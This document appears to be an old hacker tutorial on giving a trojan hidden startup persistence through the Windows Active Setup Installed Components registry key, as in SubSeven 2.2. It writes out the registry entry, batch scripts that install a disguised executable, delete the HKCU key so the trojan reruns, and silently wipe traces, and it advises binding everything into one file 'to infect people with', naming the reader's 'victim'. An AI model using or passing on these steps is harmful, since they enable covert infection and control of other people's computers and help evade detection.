his is a tutorial explaining the activex startup method used in subseven 2.2 and how to implement it for any program to run at startup.

in short, its just a hidden/silent startup.

this is a tutorial on the
hkey_local_machine\software\microsoft\active setup\installed components startup
method

the active x installed components key can be used to run programs at
windows startup.you would prefer this to other methods like
win.ini,system.ini or the run services key to startup programs
as it's harder to detect.(i mean trojans and other progs)
even if your victim is not to knowledgeable on
this matter,he just has to use msconfig.exe(in win98) or other
softwares that show registry entries in the run services key and your entry(i
mean the entry that your trojan file adds) to this key can be removed
easily.
i think this method was first used in
subseven 2.2,it's my favourite.if for some reason you want to use a trojan
server that does not support this metod ,read on.

info on this method-
a key has to be created in hkey_local_machine\software\microsoft\active
setup\installed components\key-----(key stands for any keyname of your
choice. (iron maiden,i will use this as an example) .so i would have to
create this path-
hkey_local_machine\software\microsoft\active setup\installed
components\ironmaiden
the name of the key should be "stubpath" and the value should be the
path of your file.

example-

hkey_local_machine\software\microsoft\active setup\installed
components\ironmaiden]
"stubpath"="c:\rev.exe"
(i will come back to this a little later)

you can try this on your pc with some friendly program ,so that u know
what's goin on.
click on start
run
regedit
go to hkey_local_machine\software\microsoft\active setup\installed
components
create a new key
hkey_local_machine\software\microsoft\active setup\installed
components\ironmaiden
add a new string value
rename the name to stubpath and put the value as the path of your
program
ex "name -stubpath value-c:\rev.exe
restart your pc

you'l find your program run at startup.now go to
hkey_current_user\software\microsoft\active setup\installed components ,you'l find a new key
created with the keyname u chose(here ironmaiden).this key is created
everytime a new key is created in
hkey_local_machine\software\microsoft\active setup\installed components now delete this key and restart your
pc.you'l find your program running again.
so you would have figured out
that your program starts up as long as the entry in
hkey_current_user\oftware\microsoft\active setup\installed components
is not present.the trick here is to delete this key everytime your
program runs ,so that it runs on next startup.i think in subseven 2.2, the
server renames the key in hklm each time.(corect me if iam wrong here).

now here's what u need-
1)a file binder(sennaspy one exe maker(kicks ass,has a lot of options
like copy to some dir,can hide execution)
http://www.megasecurity.org/binders/files/ssoem2.0a.zip)
2)a command line registry manipulation tool(dtreg.exe is what i use,
download it from http://www.tamedos.com/downloads)
3)your trojan file

1st step
choose a directory where you want your file to run from.i will suggest
c:\windows\system\directx as an example(u should change it to something
else).this is just to make the file harder to detect.

2nd step
use a binder like sennaspy or juntador to bind your server file to a
bat file.
to create the bat file
open notepad
copy the following lines
//
cd system
cd directx
dtreg -deletekey "\hkcu\software\microsoft\active setup\installed
components\ironmaiden"
//(without //)
save the file as something.bat

bind your file with something.bat file(in the same order,so that ur
file is executed before something.bat).supress the output screen of
something.bat by using the hide mode in sennaspy one exe maker.
this is your modified server that will startup each time.rename it as
dxsetup.exe or something.

3rd step
open notepad
copy these lines
//

regedit4

[hkey_local_machine\software\microsoft\active setup\installed
components\ironmaiden]
"stubpath"="c:\\windows\\system\\directx\\dxse tup. exe"

//(don't include //)
save it as dd.reg

create this bat file
//
cd temp
copy dxsetup.exe c:\windows\system\directx
copy dtreg.exe c:\windows\system\directx
regedit /s dd.reg
deltree /y *.*
//
save it as a bat file

now use your binder to bind the trojan file u created in step
2,dtreg.exe,the reg file dd.reg and the bat file u created above(in order
given).set the files extract to c:\windows\temp.disable running of these
programs.u just have to copy then to c:\windows\temp.the bound file is the
file u got to infect people with.